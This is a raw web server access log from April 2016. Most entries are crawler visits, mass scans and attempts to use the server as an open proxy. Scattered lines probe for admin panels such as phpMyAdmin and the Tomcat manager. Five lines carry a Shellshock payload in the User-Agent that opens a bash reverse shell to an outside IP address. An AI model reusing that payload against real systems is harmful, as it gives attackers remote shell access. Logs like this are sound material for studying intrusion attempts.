149.78.229.65 - - [21/Apr/2016:19:19:45 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
149.78.229.65 - - [21/Apr/2016:19:20:01 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
115.231.222.14 - - [21/Apr/2016:19:20:02 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0253960750779537 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
149.78.229.65 - - [21/Apr/2016:19:20:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
115.231.222.14 - - [21/Apr/2016:19:20:03 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8018839978412167 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
149.78.229.65 - - [21/Apr/2016:19:20:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
149.78.229.65 - - [21/Apr/2016:19:20:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
149.78.229.65 - - [21/Apr/2016:19:20:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
149.78.229.65 - - [21/Apr/2016:19:21:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
149.78.229.65 - - [21/Apr/2016:19:21:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
149.78.229.65 - - [21/Apr/2016:19:21:16 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
180.97.106.162 - - [21/Apr/2016:19:31:06 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
180.97.106.162 - - [21/Apr/2016:19:33:57 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
206.253.224.14 - - [21/Apr/2016:19:39:23 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
206.253.224.14 - - [21/Apr/2016:19:39:23 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
180.97.106.36 - - [21/Apr/2016:19:41:09 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
180.97.106.161 - - [21/Apr/2016:19:47:44 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
180.97.106.37 - - [21/Apr/2016:20:03:26 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
180.97.106.162 - - [21/Apr/2016:20:08:52 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
180.97.106.162 - - [21/Apr/2016:20:09:30 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
180.97.106.161 - - [21/Apr/2016:20:17:35 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
180.97.106.36 - - [21/Apr/2016:20:22:07 +0200] "GET http://www.baidu.com/robots.txt HTTP/1.1" 404 315 "-" "-"
222.85.138.75 - - [21/Apr/2016:20:34:01 +0200] "HEAD http://www.sina.com.cn HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
222.85.138.75 - - [21/Apr/2016:20:34:01 +0200] "HEAD http://www.sina.com.cn HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
222.85.138.75 - - [21/Apr/2016:20:34:01 +0200] "HEAD http://www.sina.com.cn HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
222.85.138.75 - - [21/Apr/2016:20:34:01 +0200] "HEAD http://www.sina.com.cn HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
115.231.222.14 - - [21/Apr/2016:21:29:49 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6041778204966613 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
190.214.21.185 - - [21/Apr/2016:21:35:41 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
190.214.21.185 - - [21/Apr/2016:21:35:45 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
190.214.21.185 - - [21/Apr/2016:21:35:48 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
158.255.5.147 - - [21/Apr/2016:23:22:24 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
115.231.222.14 - - [21/Apr/2016:23:39:36 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.5149358816450975 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
74.208.229.51 - - [22/Apr/2016:00:00:20 +0200] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
74.208.229.51 - - [22/Apr/2016:00:00:26 +0200] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
74.208.229.51 - - [22/Apr/2016:00:00:32 +0200] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
194.153.113.35 - - [22/Apr/2016:01:19:01 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
194.153.113.35 - - [22/Apr/2016:01:19:01 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (compatible; oBot/2.3.1; http://filterdb.iss.net/crawler/)"
115.231.222.14 - - [22/Apr/2016:01:49:43 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4783396092624744 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:01:49:46 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3501535935004146 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
89.163.148.58 - - [22/Apr/2016:01:50:40 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
89.163.148.58 - - [22/Apr/2016:01:50:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
111.248.63.154 - - [22/Apr/2016:02:11:45 +0200] "CONNECT 163mx01.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
136.243.152.18 - - [22/Apr/2016:02:11:47 +0200] "GET /robots.txt HTTP/1.0" 404 314 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
136.243.152.18 - - [22/Apr/2016:02:11:49 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
88.198.230.79 - - [22/Apr/2016:02:19:32 +0200] "GET /robots.txt HTTP/1.0" 404 334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
88.198.230.79 - - [22/Apr/2016:02:19:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
158.255.5.147 - - [22/Apr/2016:03:21:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.139.153.178 - - [22/Apr/2016:03:37:24 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:24 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:24 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:24 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:24 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:24 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:25 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:25 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:25 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
2.139.153.178 - - [22/Apr/2016:03:37:25 +0200] "GET /manager/html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0"
115.231.222.14 - - [22/Apr/2016:03:59:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8561630919260353 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:03:59:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1022072184339719 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:03:59:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2011687333867454 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:03:59:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.6555269755329555 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:03:59:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0111556137089997 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:03:59:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0792255658148605 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:03:59:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7256728183409114 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
123.59.59.52 - - [22/Apr/2016:04:11:40 +0200] "GET http://www.mafengwo.cn/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
46.4.120.3 - - [22/Apr/2016:05:10:26 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
46.4.120.3 - - [22/Apr/2016:05:10:27 +0200] "GET /index.html HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
88.151.140.210 - - [22/Apr/2016:05:44:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.38.0"
66.249.66.50 - - [22/Apr/2016:07:18:16 +0200] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.69 - - [22/Apr/2016:07:18:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.46 - - [22/Apr/2016:08:07:11 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.46 - - [22/Apr/2016:08:07:25 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
115.231.222.14 - - [22/Apr/2016:08:19:28 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1535336734852207 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:08:19:28 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8626913941344739 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:08:19:31 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.7706627416448229 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
111.248.101.11 - - [22/Apr/2016:08:25:26 +0200] "CONNECT 163mx00.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
61.231.6.92 - - [22/Apr/2016:08:25:47 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
141.212.122.161 - - [22/Apr/2016:09:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
91.121.221.15 - - [22/Apr/2016:09:25:19 +0200] "GET /robots.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
91.121.221.15 - - [22/Apr/2016:09:25:20 +0200] "GET /index.html HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)"
115.231.222.14 - - [22/Apr/2016:10:29:04 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.3378972389244582 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:10:29:05 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8088936495552273 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
66.249.78.192 - - [22/Apr/2016:10:39:33 +0200] "GET /robots.txt HTTP/1.1" 404 333 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.185 - - [22/Apr/2016:10:39:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
111.248.99.143 - - [22/Apr/2016:11:09:20 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:22 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:25 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:26 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:27 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:30 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:31 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:31 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:31 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
111.248.99.143 - - [22/Apr/2016:11:09:32 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
115.231.222.14 - - [22/Apr/2016:12:38:44 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1646645766005479 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
88.198.1.77 - - [22/Apr/2016:12:39:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) Qt/4.8.2 Safari/534.34"
169.229.3.91 - - [22/Apr/2016:13:35:28 +0200] "\xa7]pBX\xa2\x8f\xbd\xbb\xe0\x84N\xb0\x11$\xc9\xbc@\xc7Jd}\xf0Y2\x97\x87\x9d\x91\">\xae`\x1a\xac\x19\x1b\x15\x8f\x9fBT\xd7\xbf" 501 367 "-" "-"
5.206.88.106 - - [22/Apr/2016:13:41:05 +0200] "GET http://env.darkbyte.ru/?UABY9lvU HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"
192.168.10.8 - - [22/Apr/2016:14:27:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
192.168.10.8 - - [22/Apr/2016:14:27:30 +0200] "GET /favicon.ico HTTP/1.1" 404 327 "http://linux-02.f-m-computer.de/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36"
115.231.222.14 - - [22/Apr/2016:14:48:02 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.0870587399669499 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:14:48:02 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9852986044748525 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
123.59.59.52 - - [22/Apr/2016:15:13:54 +0200] "GET http://www.elong.com/ HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
74.91.20.198 - - [22/Apr/2016:15:18:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
210.72.142.101 - - [22/Apr/2016:16:12:31 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 317 "-" "() { :; }; /bin/bash -i >& /dev/tcp/65.49.37.71/2311 0<&1 2>&1"
210.72.142.101 - - [22/Apr/2016:16:12:31 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 317 "-" "() { :; }; /bin/bash -i >& /dev/tcp/65.49.37.71/2311 0<&1 2>&1"
210.72.142.101 - - [22/Apr/2016:16:12:31 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 317 "-" "() { :; }; /bin/bash -i >& /dev/tcp/65.49.37.71/2311 0<&1 2>&1"
210.72.142.101 - - [22/Apr/2016:16:12:31 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 317 "-" "() { :; }; /bin/bash -i >& /dev/tcp/65.49.37.71/2311 0<&1 2>&1"
210.72.142.101 - - [22/Apr/2016:16:12:31 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 404 317 "-" "() { :; }; /bin/bash -i >& /dev/tcp/65.49.37.71/2311 0<&1 2>&1"
115.231.222.14 - - [22/Apr/2016:16:58:08 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.2758214281563039 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
74.91.18.45 - - [22/Apr/2016:17:17:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
61.231.0.18 - - [22/Apr/2016:17:35:30 +0200] "CONNECT 163mx02.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
95.143.222.14 - - [22/Apr/2016:17:49:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
95.143.222.14 - - [22/Apr/2016:17:50:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36"
95.143.222.14 - - [22/Apr/2016:17:50:19 +0200] "GET /CHANGELOG.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36"
95.143.222.14 - - [22/Apr/2016:17:50:28 +0200] "GET /joomla.xml HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
95.143.222.14 - - [22/Apr/2016:17:50:37 +0200] "GET /administrator/manifests/libraries/joomla.xml HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
95.143.222.14 - - [22/Apr/2016:17:50:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36"
69.197.185.18 - - [22/Apr/2016:17:56:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.18.45 - - [22/Apr/2016:18:08:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
69.197.185.19 - - [22/Apr/2016:18:16:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
74.91.20.198 - - [22/Apr/2016:18:23:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
66.249.78.248 - - [22/Apr/2016:18:32:12 +0200] "GET /robots.txt HTTP/1.1" 404 337 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.248 - - [22/Apr/2016:18:32:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
107.150.32.58 - - [22/Apr/2016:18:55:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
115.231.222.14 - - [22/Apr/2016:19:07:55 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9031455725211150 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
69.197.185.20 - - [22/Apr/2016:19:09:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
107.150.32.61 - - [22/Apr/2016:20:19:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
141.212.122.161 - - [22/Apr/2016:21:07:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
115.231.222.14 - - [22/Apr/2016:21:17:10 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.8377612550358921 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
213.131.6.189 - - [22/Apr/2016:21:24:52 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.131.6.189 - - [22/Apr/2016:21:24:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
213.131.6.189 - - [22/Apr/2016:21:25:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
213.131.6.189 - - [22/Apr/2016:21:25:05 +0200] "GET /CHANGELOG.txt HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9"
213.131.6.189 - - [22/Apr/2016:21:25:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
213.131.6.189 - - [22/Apr/2016:21:25:14 +0200] "GET /readme.html HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36"
213.131.6.189 - - [22/Apr/2016:21:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0"
